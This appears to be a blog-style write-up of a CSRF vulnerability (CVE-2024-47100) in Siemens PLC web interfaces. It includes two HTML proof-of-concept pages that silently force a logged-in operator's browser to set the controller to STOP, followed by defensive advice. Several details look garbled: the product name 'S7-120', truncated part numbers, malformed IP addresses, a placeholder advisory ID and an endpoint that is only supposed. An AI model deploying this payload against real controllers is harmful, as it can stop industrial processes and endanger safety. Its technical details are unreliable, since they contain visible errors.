CVE-2024-47100 - CSRF in Siemens SIMATIC S7-120/SIPLUS S7-120 PLCs — Changing CPU Mode with One Click

CVE-2024-47100 is a recently disclosed vulnerability affecting a wide range of Siemens SIMATIC S7-120 and SIPLUS S7-120 PLCs. The bug exists in their web interface, exposing it to Cross-Site Request Forgery (CSRF) attacks. With a simple trick—like a booby-trapped link in an email—an attacker could make a logged-in user (such as an operator) change the CPU mode (like from "RUN" to "STOP") on industrial controllers without them ever realizing they did it. This could disrupt processes, production lines, or safety systems in sectors like manufacturing, energy, or water.

Below, we break down how this works, how to exploit it, and what you can do to prevent it.

What Devices Are Vulnerable?

Affected devices include many versions of Siemens SIMATIC S7-120 and SIPLUS S7-120 CPUs. These are common in industrial plants worldwide.

Sample affected part numbers

- SIMATIC S7-120 CPU 1211C AC/DC/Rly (6ES7211-1BE40-XB)
- SIMATIC S7-120 CPU 1212C DC/DC/DC (6ES7212-1AE40-XB)
- SIPLUS S7-120 CPU 1212 AC/DC/RLY (6AG1212-1BE40-2XB)
- SIPLUS S7-120 CPU 1215 AC/DC/RLY (6AG1215-1BG40-2XB)

For the full list, see: Siemens Advisory (CERT-2024-XX)

How Does the Vulnerability Work?

Many SIMATIC/SIPLUS devices have an HTTP web interface for remote monitoring and control. Operators log in using their browsers for convenient configuration, monitoring, or maintenance.

What is CSRF?

CSRF (Cross-Site Request Forgery) is a web vulnerability that lets an attacker trick a logged-in user’s browser into making unwanted actions on a web app. Because the request seems to come from the genuine session, it’s accepted.

For example

- User logs in at the PLC web interface (http://plc-ip).

Without logging out, the user browses to an attacker’s webpage or clicks a link in an email.

- That malicious page silently triggers a command (like “Set PLC to STOP”) using the user’s permissions.

What Can Go Wrong?

On these PLCs, the web interface does not adequately verify the origin of state-changing requests. There's no CSRF token or referer/origin check. So, any user with a session—and enough PLC permissions—can be silently tricked into, say, stopping the controller:

How the Exploit Works

Let’s get practical: here’s how an attacker can change the CPU mode (for instance, put it from RUN to STOP) if a logged-in operator clicks their crafted link.

Suppose the PLC web interface has a URL for setting the CPU mode

POST http://<PLC-IP>/webcfg/cpu_mode.cgi

And expects parameters like

mode=STOP

Malicious HTML page

<!DOCTYPE html>
<html>
  <body>
    <h3>Click here to see an interesting diagram!</h3>
    <img src="http://192.168..100/webcfg/cpu_mode.cgi?mode=STOP"; style="display:none;">
    <!-- Or, for a POST (using JS or tag): -->
    <form action="http://192.168..100/webcfg/cpu_mode.cgi"; method="POST" id="csrfForm">
      <input type="hidden" name="mode" value="STOP">
    </form>
    <script>
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>

- When the victim is logged into the PLC’s web portal and visits this page, their browser sends the CPU mode change request _with their valid session_.

Operator clicks the attacker’s link.

4. Attacker’s site sends a silent POST request to /webcfg/cpu_mode.cgi?mode=STOP on the PLC.

Demo Snippet: CSRF “Stop PLC” Exploit

Here is a complete proof-of-concept that can be dropped into any webpage (change PLC IP as needed):

<!DOCTYPE html>
<title>PLC CPU STOP – PoC</title>
<body>
<p>Loading interesting picture...</p>
<form id="csrf" action="http://192.168..100/webcfg/cpu_mode.cgi"; method="POST">
    <input type="hidden" name="mode" value="STOP">
</form>
<script>
window.onload = function() {
    document.getElementById('csrf').submit();
};
</script>
</body>

How it works:

User visits this web page.

- If their browser is logged in to the PLC web interface at 192.168..100, the PLC will receive mode=STOP POST and go to STOP.

Real-World Attack Scenario

Imagine:
A maintenance engineer at a bottling factory logs into the SIMATIC PLC via web for routine checks.
Later, she reads her email. She sees a “PLC manual update” link and clicks it.
The link loads the attacker’s CSRF code above.
The PLC—and the whole line—stops instantly.

How to Defend Against CVE-2024-47100

1. Patch/Update
Check Siemens’ advisory for firmware updates and apply ASAP.

2. Minimize Web Interface Use
If possible, disable or restrict the web interface on critical controllers.

3. Enforce Network Segmentation
Never expose PLC web UIs to the public, and limit which internal hosts can reach them.

4. Log Out After Use
Train users to ALWAYS log out of PLC web sessions after work.

5. Use Secure User Permissions
Grant minimal privileges to each user—never “admin” to everyone.

6. Browser Hygiene
Don’t mix work (PLC access) and general browsing on the same workstation.

References

- Siemens Security Advisory SSA-337959
- Siemens Product CERT portal
- MITRE CVE-2024-47100 entry
- OWASP Guide: CSRF

Final Thoughts

CSRF might look “boring” compared to remote code execution, but on a PLC, a one-click shutdown can be devastating to a plant. CVE-2024-47100 reminds us that even basic web bugs become critical in Industrial Control Systems.

Timeline

Published on: 01/14/2025 11:15:16 UTC